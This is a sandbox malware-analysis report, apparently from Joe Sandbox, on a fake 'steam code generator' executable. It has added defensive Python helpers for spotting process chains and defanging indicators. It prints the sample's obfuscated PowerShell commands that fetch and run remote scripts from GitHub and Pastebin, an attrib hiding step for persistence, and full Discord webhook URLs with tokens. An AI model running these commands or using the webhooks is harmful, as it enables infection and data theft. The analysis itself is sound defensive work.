Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3966
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5820
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5141
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4586
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1794
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4505
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5217
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 952
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5089
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4636
Source: C:\Users\user\Desktop\steamcodegenerator.exeAPI coverage: 8.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4560Thread sleep count: 3966 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep count: 5820 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2360Thread sleep count: 47 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2144Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 404Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4236Thread sleep count: 1794 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1408Thread sleep count: 205 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4600Thread sleep count: 4505 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5712Thread sleep count: 5217 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 356Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2748Thread sleep count: 952 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep count: 183 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4548Thread sleep count: 118 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5392Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep count: 5089 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep count: 4636 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6832Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C070478 FindFirstFileExW,0_2_00007FF71C070478
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000006.00000002.2668833493.000001FBFE571000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
Source: steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729DC000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 0000000D.00000002.2858371169.000002B3B4024000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllffzs
Source: powershell.exe, 00000011.00000002.2955482624.000001D19C400000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C061D58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF71C061D58
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C07483C GetProcessHeap,0_2_00007FF71C07483C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C0595DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF71C0595DC
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C05998C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF71C05998C
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C059B30 SetUnhandledExceptionFilter,0_2_00007FF71C059B30

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\steamcodegenerator.exeNtMapViewOfSection: Indirect: 0x20C7473889A
Source: C:\Users\user\Desktop\steamcodegenerator.exeNtMapViewOfSection: Indirect: 0x20C7473835D
Source: C:\Users\user\Desktop\steamcodegenerator.exeNtUnmapViewOfSection: Indirect: 0x20C7473882E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" sal notpad iEx; sal $env:os iWr; notpad(windows_nT raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C078F80 cpuid 0_2_00007FF71C078F80
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF71C074524
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: EnumSystemLocalesW,0_2_00007FF71C073E38
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: EnumSystemLocalesW,0_2_00007FF71C073F08
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF71C073FA0
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,0_2_00007FF71C06B7F8
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,0_2_00007FF71C0741E8
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF71C073ADC
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF71C074340
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: EnumSystemLocalesW,0_2_00007FF71C06B378
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: GetLocaleInfoW,0_2_00007FF71C0743F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\steamcodegenerator.exeCode function: 0_2_00007FF71C059880 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF71C059880
MITRE ATT&CK Matrix (one line per tactic; the number shown beside a technique in the original matrix is kept in parentheses)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation (111); PowerShell (2); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: Registry Run Keys / Startup Folder (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); Abuse Elevation Control Mechanism (1); Registry Run Keys / Startup Folder (11); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (131); Process Injection (11); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (1); DLL Side-Loading (1); Compile After Delivery; Indicator Removal from Tools
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (1); Query Registry (1); Security Software Discovery (131); Process Discovery (1); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (33)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Web Service (1); Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (14); Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID 1534102; sample: steamcodegenerator.exe; start date: 15/10/2024; architecture: WINDOWS; score: 96)

Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 2 other signatures.
Sample-level network: pastebin.com (Connects to a pastebin service (likely for C&C)); raw.githubusercontent.com; 3 other IPs or domains.

Process tree (graph node numbers in parentheses; "->" marks a started child process):

steamcodegenerator.exe (9)
    network: github.com 140.82.121.3:443 (src port 49711; GITHUBUS, United States); objects.githubusercontent.com 185.199.111.133:443 (src port 49712; FASTLYUS, Netherlands)
    signatures: Suspicious powershell command line found; Found direct / indirect Syscall (likely to bypass EDR)
    -> powershell.exe (17)
        signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Suspicious powershell command line found; Powershell creates an autostart link
        -> powershell.exe (30)
            network: raw.githubusercontent.com 185.199.109.133:443 (src ports 49791, 49797; FASTLYUS, Netherlands); discord.com 162.159.138.232:443 (src ports 49898, 49983; CLOUDFLARENETUS, United States)
            dropped: C:\ProgramData\...\BeginSync.lnk (MS)
            signature: Tries to open files direct via NTFS file id
            -> conhost.exe (39)
            -> attrib.exe (41)
    -> conhost.exe (20)
forfiles.exe (13)
    -> powershell.exe (22)
        -> powershell.exe (35)
            network: pastebin.com 172.67.19.24:443 (src ports 49894, 49900; CLOUDFLARENETUS, United States)
    -> conhost.exe (24)
forfiles.exe (15)
    -> powershell.exe (26)
        -> powershell.exe (37)
    -> conhost.exe (28)
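The notable feature of this tree is that two of the three PowerShell lineages are rooted in forfiles.exe rather than in the sample itself: forfiles.exe is a signed Windows utility that runs an arbitrary command for each file it matches, so it serves as a proxy parent that breaks the naive steamcodegenerator.exe -> powershell.exe lineage, and each of its PowerShell children launches a second powershell.exe. The following Python helper is an added example, not output of Joe Sandbox or code from the sample; it rebuilds the tree from process-creation events and searches it for parent-child image sequences. The events are constructed from the graph (node numbers reused as PIDs, image paths assumed) and the rule patterns are the example's own.

```python
"""Find LOLBin process chains like the ones in the behavior graph above.

Added example, not Joe Sandbox output. The events are constructed from the
graph (its node numbers reused as PIDs; image paths are assumed); the rule
patterns are the example's own.
"""
from collections import defaultdict

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CONHOST = r"C:\Windows\System32\conhost.exe"
FORFILES = r"C:\Windows\System32\forfiles.exe"

# Constructed process-creation events (Sysmon EID 1 style): (pid, parent pid, image path).
EVENTS = [
    (9, 1, r"C:\Users\user\Desktop\steamcodegenerator.exe"),
    (17, 9, PS), (20, 9, CONHOST),
    (30, 17, PS), (39, 30, CONHOST), (41, 30, r"C:\Windows\System32\attrib.exe"),
    (13, 1, FORFILES), (22, 13, PS), (24, 13, CONHOST), (35, 22, PS),
    (15, 1, FORFILES), (26, 15, PS), (28, 15, CONHOST), (37, 26, PS),
]

# Parent -> child image sequences worth alerting on. forfiles.exe runs an
# arbitrary command per matched file (/c), so it is a classic proxy parent.
RULES = {
    "forfiles proxy-executes powershell": ["forfiles.exe", "powershell.exe"],
    "forfiles -> powershell -> powershell (staged script)": ["forfiles.exe", "powershell.exe", "powershell.exe"],
    "powershell re-launches powershell": ["powershell.exe", "powershell.exe"],
    "powershell spawns attrib.exe": ["powershell.exe", "attrib.exe"],
}

def image_name(path):
    """Basename of a Windows image path, lower-cased for matching."""
    return path.rsplit("\\", 1)[-1].lower()

def build_tree(events):
    """Return ({pid: image name}, {ppid: [child pids]})."""
    images = {pid: image_name(img) for pid, _, img in events}
    children = defaultdict(list)
    for pid, ppid, _ in events:
        children[ppid].append(pid)
    return images, children

def find_chains(events, pattern):
    """Every pid chain whose images match `pattern` as consecutive parent->child links."""
    images, children = build_tree(events)
    pattern = [p.lower() for p in pattern]

    def extend(chain):
        # Depth-first: grow the chain one generation at a time along the pattern.
        if len(chain) == len(pattern):
            return [chain]
        matches = []
        for kid in children.get(chain[-1], []):
            if images[kid] == pattern[len(chain)]:
                matches.extend(extend(chain + [kid]))
        return matches

    found = []
    for pid, img in images.items():
        if img == pattern[0]:
            found.extend(extend([pid]))
    return found

def evaluate(events, rules=RULES):
    """Run every rule; rules with no matching chain are dropped from the result."""
    hits = {name: find_chains(events, pat) for name, pat in rules.items()}
    return {name: chains for name, chains in hits.items() if chains}

if __name__ == "__main__":
    for name, chains in evaluate(EVENTS).items():
        print(f"{name}: {chains}")
```

Matching on consecutive parent-child links rather than on any ancestor keeps the rule strict; loosening `extend` to walk grandchildren would also catch chains where a conhost.exe or cmd.exe sits between the two PowerShell instances, at the cost of more noise.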

Antivirus detection, initial sample
Source | Detection | Scanner | Label
steamcodegenerator.exe | 42% | ReversingLabs | -

Antivirus detection, dropped files: No Antivirus matches
Antivirus detection, unpacked PE files: No Antivirus matches
Antivirus detection, domains: No Antivirus matches

Antivirus detection, URLs
Source | Detection | Scanner | Label
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.138.232 | true | true | - | unknown
github.com | 140.82.121.3 | true | false | - | unknown
raw.githubusercontent.com | 185.199.109.133 | true | true | - | unknown
objects.githubusercontent.com | 185.199.111.133 | true | false | - | unknown
pastebin.com | 172.67.19.24 | true | true | - | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | - | unknown
http://pastebin.com/raw/sA04Mwk2 | false | - | unknown
https://pastebin.com/raw/sA04Mwk2 | false | - | unknown
https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt | false | - | unknown
https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 | true | - | unknown
http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt | false | - | unknown
https://github.com/user-attachments/files/17267811/stm.txt | false | - | unknown
http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | - | unknown
https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI | true | - | unknown
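The contacted URLs fall into three patterns that recur across the report: raw pastes on pastebin.com, raw files from a throwaway-named GitHub repository (the DriverDiag.dll, gaber.txt and cr_asm.txt paths), and Discord webhook endpoints, which are the only entries the report marks malicious outright. The Python helper below is an added triage example, not part of the Joe Sandbox report or of the sample; it classifies each URL by pattern, defangs it for pasting into a ticket, and separates a Discord webhook's numeric identifier from its token so the token itself is not copied around. The category names and the input list (the URLs from the table above) are the example's own arrangement.

```python
"""Classify and defang the network indicators from a sandbox URL table.

Added example for triage of the URL list above; the categories and the
handling rules are the example's own, not output of Joe Sandbox.
"""
import re
from urllib.parse import urlsplit

# Input constructed from the "Contacted URLs" table of the report.
OBSERVED_URLS = [
    "https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt",
    "http://pastebin.com/raw/sA04Mwk2",
    "https://pastebin.com/raw/sA04Mwk2",
    "https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm.txt",
    "https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2",
    "https://github.com/user-attachments/files/17267811/stm.txt",
    "https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI",
]

_WEBHOOK = re.compile(r"^/api/webhooks/(?P<id>\d+)/(?P<token>[A-Za-z0-9_\-]+)$")
_RAW_GITHUB = re.compile(r"^/(?P<owner>[^/]+)/(?P<repo>[^/]+)/(?P<ref>[^/]+)/(?P<path>.+)$")

def classify(url):
    """Return (category, details) for one URL.

    Categories (this example's vocabulary):
      pastebin-raw       raw paste fetch; the paste id is kept
      github-raw         raw file from a user repository; owner/repo/ref/path are kept
      github-attachment  file attached to a GitHub issue or PR
      discord-webhook    webhook id and token split out
      other              anything else
    """
    parts = urlsplit(url)
    host = parts.hostname or ""
    path = parts.path
    if host == "pastebin.com" and path.startswith("/raw/"):
        return "pastebin-raw", {"paste_id": path.split("/", 2)[2]}
    if host == "raw.githubusercontent.com":
        m = _RAW_GITHUB.match(path)
        if m:
            return "github-raw", m.groupdict()
    if host == "github.com" and path.startswith("/user-attachments/files/"):
        return "github-attachment", {"path": path}
    if host in ("discord.com", "discordapp.com"):
        m = _WEBHOOK.match(path)
        if m:
            return "discord-webhook", {"webhook_id": m["id"], "token": m["token"]}
    return "other", {}

def defang(url):
    """Make a URL non-clickable: hxxp(s):// scheme and [.] in the host."""
    parts = urlsplit(url)
    host = (parts.hostname or "").replace(".", "[.]")
    scheme = parts.scheme.replace("http", "hxxp", 1)
    return f"{scheme}://{host}{parts.path}"

def build_ioc_report(urls):
    """Group URLs by category; webhook tokens are replaced by a length marker."""
    report = {}
    for url in urls:
        cat, details = classify(url)
        entry = {"url": defang(url), **details}
        if "token" in entry:
            entry["token"] = f"<{len(entry['token'])}-char token redacted>"
        report.setdefault(cat, []).append(entry)
    return report

if __name__ == "__main__":
    for cat, items in build_ioc_report(OBSERVED_URLS).items():
        print(cat)
        for item in items:
            print("   ", item)
```

The webhook identifier is enough to correlate sightings across samples; the token is the credential that lets anyone post to the channel, so it belongs in a sealed evidence store, not in the shared IOC list.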
URLs from memory and binary data
Name | Source | Malicious | Antivirus Detection | Reputation
